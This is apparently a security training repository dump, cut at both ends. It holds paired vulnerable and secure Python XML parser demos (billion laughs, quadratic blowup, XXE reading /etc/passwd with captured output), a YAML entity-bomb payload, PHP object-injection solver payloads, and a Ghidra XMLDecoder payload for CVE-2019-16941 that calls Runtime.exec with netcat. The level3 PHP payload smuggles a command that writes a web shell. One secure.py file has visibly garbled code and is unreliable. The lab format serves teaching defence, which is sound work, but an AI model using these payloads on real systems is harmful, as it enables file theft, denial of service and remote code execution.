 4 | $ docker build . -t external-entity-expansion-pulldom-secure
 5 | $ docker run external-entity-expansion-pulldom-secure
 6 | START_DOCUMENT <xml.dom.minidom.Document object at 0x7fedc01a4768>
 7 | START_ELEMENT <DOM Element: data at 0x7fedc031a2a8>
 8 | CHARACTERS <DOM Text node "'\n'">
 9 | CHARACTERS <DOM Text node "'  '">
10 | CHARACTERS <DOM Text node "'\n'">
11 | END_ELEMENT <DOM Element: data at 0x7fedc031a2a8>
12 | ```
13 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/etree/README.md:
--------------------------------------------------------------------------------
 1 | # Billion Laughs on etree
 2 | 
 3 | ```
 4 | $ docker build . -t billion-laughs-etree
 5 | $ docker run billion-laughs-etree
 6 | CPU: 0.0 %, Memory: 564 KB
 7 | CPU: 99.0 %, Memory: 544644 KB
 8 | CPU: 99.5 %, Memory: 1142112 KB
 9 | CPU: 102 %, Memory: 1603676 KB
10 | CPU: 101 %, Memory: 1587336 KB
11 | CPU: 104 %, Memory: 0 KB
12 | ./run.sh: line 12:     7 Killed                  python vulnerable.py
13 | CPU:  %, Memory:  KB
14 | CPU:  %, Memory:  KB
15 | CPU:  %, Memory:  KB
16 | CPU:  %, Memory:  KB
17 | ```
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/etree/README.md:
--------------------------------------------------------------------------------
 1 | # Quadratic blowup on etree
 2 | 
 3 | ```
 4 | $ docker build . -t quadratic-blowup-etree
 5 | $ docker run quadratic-blowup-etree
 6 | CPU: 0.0 %, Memory: 4928 KB
 7 | CPU: 100 %, Memory: 533632 KB
 8 | CPU: 100 %, Memory: 1108360 KB
 9 | CPU: 102 %, Memory: 1621636 KB
10 | CPU: 102 %, Memory: 1604204 KB
11 | CPU: 86.3 %, Memory: 0 KB
12 | ./run.sh: line 12:     7 Killed                  python vulnerable.py
13 | CPU:  %, Memory:  KB
14 | CPU:  %, Memory:  KB
15 | CPU:  %, Memory:  KB
16 | CPU:  %, Memory:  KB
17 | 
18 | ```
19 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/pulldom/README.md:
--------------------------------------------------------------------------------
 1 | # Quadratic Blowup on pulldom
 2 | 
 3 | ```
 4 | $ docker build . -t quadratic-blowup-pulldom
 5 | $ docker run quadratic-blowup-pulldom
 6 | CPU: 0.0 %, Memory: 4748 KB
 7 | CPU: 99.0 %, Memory: 433268 KB
 8 | CPU: 100 %, Memory: 980012 KB
 9 | CPU: 100 %, Memory: 1533780 KB
10 | CPU: 101 %, Memory: 1608412 KB
11 | CPU: 101 %, Memory: 1597040 KB
12 | CPU: 78.5 %, Memory: 0 KB
13 | ./run.sh: line 12:     7 Killed                  python vulnerable.py
14 | CPU:  %, Memory:  KB
15 | CPU:  %, Memory:  KB
16 | CPU:  %, Memory:  KB
17 | 
18 | ```
19 | 


--------------------------------------------------------------------------------
/exercise/object-injection/solver/level2-payload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |   class Setting {
 3 |     public $path = "config.json";
 4 |     public function read() {
 5 |       $content = file_get_contents($this->path);
 6 |       echo $content;
 7 |     }
 8 |   }
 9 |   
10 |   class Main {
11 |     public $file = null;
12 |     public function __destruct(){
13 |       $this->file->read();
14 |     }
15 |   }
16 | 
17 |   $m = new Main();
18 |   $m->file=new Setting();
19 |   $m->file->path = "/etc/passwd";
20 |   echo serialize($m);
21 |   //http://localhost:5000/level2.php?object=O:4:%22Main%22:1:{s:4:%22file%22;O:7:%22Setting%22:1:{s:4:%22path%22;s:11:%22/etc/passwd%22;}}


--------------------------------------------------------------------------------
/exercise/object-injection/nginx/default.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     index index.php index.html;
 3 |     server_name localhost;
 4 |     error_log  /var/log/nginx/error.log;
 5 |     access_log /var/log/nginx/access.log;
 6 |     root /var/www/html;
 7 | 
 8 |     location / {
 9 |         try_files $uri $uri/ /index.php$is_args$args;
10 |     }
11 | 
12 |     location ~ \.php$ {
13 |         fastcgi_split_path_info ^(.+\.php)(/.+)$;
14 |         fastcgi_pass php:9000;
15 |         fastcgi_index index.php;
16 |         include fastcgi_params;
17 |         fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
18 |         fastcgi_param PATH_INFO $fastcgi_path_info;
19 |     }
20 | }


--------------------------------------------------------------------------------
/handson/yaml-parser/billion-laughs/payload.yml:
--------------------------------------------------------------------------------
 1 | lol1: &lol1 "lol" 
 2 | lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] 
 3 | lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2]
 4 | lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3]
 5 | lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4]
 6 | lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5]
 7 | lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6]
 8 | lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7]
 9 | lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8]
10 | lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]


--------------------------------------------------------------------------------
/exercise/object-injection/solver/level3-payload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |   class Setting {
 3 |     public $path = "config.json";
 4 |     public function read() {
 5 |       system("cat " . $this->path);
 6 |     }
 7 |   }
 8 |   
 9 |   class Main {
10 |     public $file = null;
11 |     public function __destruct(){
12 |       $this->file->read();
13 |     }
14 |   }
15 |   
16 |   $m = new Main();
17 |   $m->file=new Setting();
18 |   $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php';
19 |   echo serialize($m);
20 |   // http://localhost:5000/level3.php?object=O:4:%22Main%22:1:{s:4:%22file%22;O:7:%22Setting%22:1:{s:4:%22path%22;s:57:%22config.json;%20echo%20%27%3C?php%20system($_GET[%22cmd%22]);?%3E%27%20%3E%20a.php%22;}}


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.0/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | 
 6 | class ExampleContentHandler(sax.ContentHandler):
 7 |     def __init__(self):
 8 |         sax.ContentHandler.__init__(self)
 9 |  
10 |     def startElement(self, name, attrs):
11 |         print("Start:", name.strip())
12 |  
13 |     def endElement(self, name):
14 |         print("End:", name.strip())
15 |  
16 |     def characters(self, content):
17 |         print(content.strip())
18 | 
19 | data = '''\
20 | <!DOCTYPE data [
21 | <!ENTITY secret SYSTEM "file:///etc/passwd">
22 | ]>
23 | <data>
24 |     &secret;
25 | </data>
26 | '''
27 | 
28 | sax.parseString(data, ExampleContentHandler())
29 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.1/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | 
 6 | class ExampleContentHandler(sax.ContentHandler):
 7 |     def __init__(self):
 8 |         sax.ContentHandler.__init__(self)
 9 |  
10 |     def startElement(self, name, attrs):
11 |         print("Start:", name.strip())
12 |  
13 |     def endElement(self, name):
14 |         print("End:", name.strip())
15 |  
16 |     def characters(self, content):
17 |         print(content.strip())
18 | 
19 | data = '''\
20 | <!DOCTYPE data [
21 | <!ENTITY secret SYSTEM "file:///etc/passwd">
22 | ]>
23 | <data>
24 |     &secret;
25 | </data>
26 | '''
27 | 
28 | sax.parseString(data, ExampleContentHandler())
29 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/sax/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | 
 6 | class ExampleContentHandler(sax.ContentHandler):
 7 |     def __init__(self):
 8 |         sax.ContentHandler.__init__(self)
 9 |  
10 |     def startElement(self, name, attrs):
11 |         pass
12 |  
13 |     def endElement(self, name):
14 |         pass
15 |  
16 |     def characters(self, content):
17 |         pass
18 | 
19 | size = 55000
20 | entity = 'A' * size
21 | refs = '&x;' * size
22 | data = '''\
23 | <?xml version="1.0"?>
24 | <!DOCTYPE DoS [
25 |     <!ENTITY x "{entity}">
26 | ]>
27 | <DoS>{entityReferences}</DoS>
28 | '''.format(entity=entity, entityReferences=refs)
29 | 
30 | sax.parseString(data, ExampleContentHandler())
31 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.0/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | import defusedxml.sax
 6 | 
 7 | class ExampleContentHandler(sax.ContentHandler):
 8 |     def __init__(self):
 9 |         sax.ContentHandler.__init__(self)
10 |  
11 |     def startElement(self, name, attrs):
12 |         print("Start:", name.strip())
13 |  
14 |     def endElement(self, name):
15 |         print("End:", name.strip())
16 |  
17 |     def characters(self, content):
18 |         print(content.strip())
19 | 
20 | data = '''\
21 | <!DOCTYPE data [
22 | <!ENTITY secret SYSTEM "file:///etc/passwd">
23 | ]>
24 | <data>
25 |     &secret;
26 | </data>
27 | '''
28 | 
29 | defusedxml.sax.parseString(data, ExampleContentHandler())
30 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.1/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | import defusedxml.sax
 6 | 
 7 | class ExampleContentHandler(sax.ContentHandler):
 8 |     def __init__(self):
 9 |         sax.ContentHandler.__init__(self)
10 |  
11 |     def startElement(self, name, attrs):
12 |         print("Start:", name.strip())
13 |  
14 |     def endElement(self, name):
15 |         print("End:", name.strip())
16 |  
17 |     def characters(self, content):
18 |         print(conten.strip()t)
19 | 
20 | data = b'''\
21 | <!DOCTYPE data [
22 | <!ENTITY secret SYSTEM "file:///etc/passwd">
23 | ]>
24 | <data>
25 |     &secret;
26 | </data>
27 | '''
28 | 
29 | defusedxml.sax.parseString(data, ExampleContentHandler())
30 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/sax/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | import defusedxml.sax
 6 | 
 7 | class ExampleContentHandler(sax.ContentHandler):
 8 |     def __init__(self):
 9 |         sax.ContentHandler.__init__(self)
10 |  
11 |     def startElement(self, name, attrs):
12 |         pass
13 |  
14 |     def endElement(self, name):
15 |         pass
16 |  
17 |     def characters(self, content):
18 |         pass
19 | 
20 | size = 55000
21 | entity = 'A' * size
22 | refs = '&x;' * size
23 | data = '''\
24 | <?xml version="1.0"?>
25 | <!DOCTYPE DoS [
26 |     <!ENTITY x "{entity}">
27 | ]>
28 | <DoS>{entityReferences}</DoS>
29 | '''.format(entity=entity, entityReferences=refs)
30 | 
31 | defusedxml.sax.parseString(data, ExampleContentHandler())
32 | 


--------------------------------------------------------------------------------
/handson/yaml-parser/quadratic-blowup/README.md:
--------------------------------------------------------------------------------
 1 | # Quadratic blowup on PyYAML
 2 | 
 3 | ```
 4 | $ docker build . -t quadratic-blowup-pyyaml
 5 | $ docker run quadratic-blowup-pyyaml
 6 | Collecting PyYaml
 7 |   Downloading PyYAML-5.4.1-cp39-cp39-manylinux1_x86_64.whl (630 kB)
 8 | Installing collected packages: PyYaml
 9 | WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
10 | Successfully installed PyYaml-5.4.1
11 | CPU: 0.0 %, Memory: 5772 KB
12 | CPU: 100 %, Memory: 10296 KB
13 | CPU: 100 %, Memory: 165864 KB
14 | CPU: 100 %, Memory: 507516 KB
15 | CPU: 100 %, Memory: 843240 KB
16 | CPU: 100 %, Memory: 1177200 KB
17 | CPU: 101 %, Memory: 1592756 KB
18 | CPU: 102 %, Memory: 1608460 KB
19 | CPU: 101 %, Memory: 1604040 KB
20 | ./run.sh: line 13:    10 Killed                  python vulnerable.py
21 | CPU:  %, Memory:  KB
22 | ```
23 | 


--------------------------------------------------------------------------------
/zizen-kadai/kadai1/CVE-2019-16941/payload.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <java version="11.0.9" class="java.beans.XMLDecoder">
 3 |  <object class="ghidra.bitpatterns.info.FileBitPatternInfo">
 4 |   <void property="ghidraURL">
 5 |    <string>TODO: url</string>
 6 |   </void>
 7 |   <void property="languageID">
 8 |    <string>x86:LE:64:default</string>
 9 |   </void>
10 |   <void property="numFirstBytes">
11 |    <int>16</int>
12 |   </void>
13 |   <void property="numFirstInstructions">
14 |    <int>4</int>
15 |   </void>
16 |   <void property="numPreBytes">
17 |    <int>12</int>
18 |   </void>
19 |   <void property="numPreInstructions">
20 |    <int>3</int>
21 |   </void>
22 |   <void property="numReturnBytes">
23 |    <int>12</int>
24 |   </void>
25 |   <void property="numReturnInstructions">
26 |    <int>3</int>
27 |   </void>
28 |  </object>
29 |  <object class="java.lang.Runtime" method="getRuntime">
30 |   <void method="exec">
31 |    <string>nc 127.0.0.1 1337</string>
32 |   </void>
33 |  </object>
34 | </java>
35 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/etree/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.ElementTree as ET
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | root = ET.fromstring(data)
25 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/etree/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.etree.ElementTree as ET
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | root = ET.fromstring(data)
25 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/pulldom/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | doc = pulldom.parseString(data)
25 | for event, node in doc:
26 |     pass
27 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/pulldom/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | doc = pulldom.parseString(data)
25 | for event, node in doc:
26 |     pass
27 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/minidom/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.minidom as minidom
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | dom = minidom.fromstring(data)
25 | for child in dom.childNodes:
26 |     for node in child.childNodes:
27 |         pass


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/minidom/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.minidom as minidom
 5 | 
 6 | data = '''\
 7 | <?xml version="1.0"?>
 8 | <!DOCTYPE lolz [
 9 |     <!ENTITY lol "lol">
10 |     <!ELEMENT lolz (#PCDATA)>
11 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
12 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
13 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
14 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
15 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
16 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
17 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
18 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
19 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
20 | ]>
21 | <lolz>&lol9;</lolz>
22 | '''
23 | 
24 | dom = minidom.parseString(data)
25 | for child in dom.childNodes:
26 |     for node in child.childNodes:
27 |         pass
28 | 


--------------------------------------------------------------------------------
/exercise/object-injection/src/index.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="ja">
 3 | <head>
 4 |   <meta charset="utf-8">
 5 |   <title>Seccamp2021 B5</title>
 6 |   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
 7 |   <link rel='stylesheet prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css'>
 8 | </head>
 9 | <body>
10 | <nav class="navbar is-light" role="navigation" aria-label="main navigation">
11 |   <div class="navbar-brand">
12 |     <span class="navbar-item">
13 |       <span class="icon-text is-large">
14 |         <span class="fa fa-language">PHP Object Injection Exercise</span>
15 |       </span>
16 |     </span>
17 |   </div>
18 |   <div class="navbar-menu">
19 |     <div class="navbar-start">
20 |       <a class="navbar-item" href="./">
21 |         Home
22 |       </a>
23 |     </div>
24 |   </div>
25 | </nav>
26 | 
27 | <div class="container">
28 |   <br>
29 |   <h1 class="title">趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求<br>デシリアライズ編</h1>
30 |   <li><a href="./level0.php">Level0</a></li>
31 |   <li><a href="./level1.php">Level1</a></li>
32 |   <li><a href="./level2.php">Level2</a></li>
33 |   <li><a href="./level3.php">Level3</a></li>
34 | </div>
35 | 
36 | </body>
37 | </html>


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.0/README.md:
--------------------------------------------------------------------------------
 1 | # External entity expansion on sax
 2 | 
 3 | ```
 4 | $ docker build . -t external-entity-expansion-sax
 5 | $ docker run external-entity-expansion-sax
 6 | Start: data
 7 | 
 8 | 
 9 | root:x:0:0:root:/root:/bin/bash
10 | 
11 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
12 | 
13 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
14 | 
15 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
16 | 
17 | sync:x:4:65534:sync:/bin:/bin/sync
18 | 
19 | games:x:5:60:games:/usr/games:/usr/sbin/nologin
20 | 
21 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
22 | 
23 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
24 | 
25 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
26 | 
27 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
28 | 
29 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
30 | 
31 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
32 | 
33 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
34 | 
35 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
36 | 
37 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
38 | 
39 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
40 | 
41 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
42 | 
43 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
44 | 
45 | _apt:x:100:65534::/nonexistent:/bin/false
46 | 
47 | 
48 | End: data
49 | ```


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/sax/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.sax as sax
 5 | 
 6 | class ExampleContentHandler(sax.ContentHandler):
 7 |     def __init__(self):
 8 |         sax.ContentHandler.__init__(self)
 9 |  
10 |     def startElement(self, name, attrs):
11 |         pass
12 |  
13 |     def endElement(self, name):
14 |         pass
15 |  
16 |     def characters(self, content):
17 |         pass
18 | 
19 | data = '''\
20 | <?xml version="1.0"?>
21 | <!DOCTYPE lolz [
22 |     <!ENTITY lol "lol">
23 |     <!ELEMENT lolz (#PCDATA)>
24 |     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
25 |     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
26 |     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
27 |     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
28 |     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
29 |     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
30 |     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
31 |     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
32 |     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
33 | ]>
34 | <lolz>&lol9;</lolz>
35 | '''
36 | 
37 | sax.parseString(data, ExampleContentHandler())
38 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/sax/secure.py:
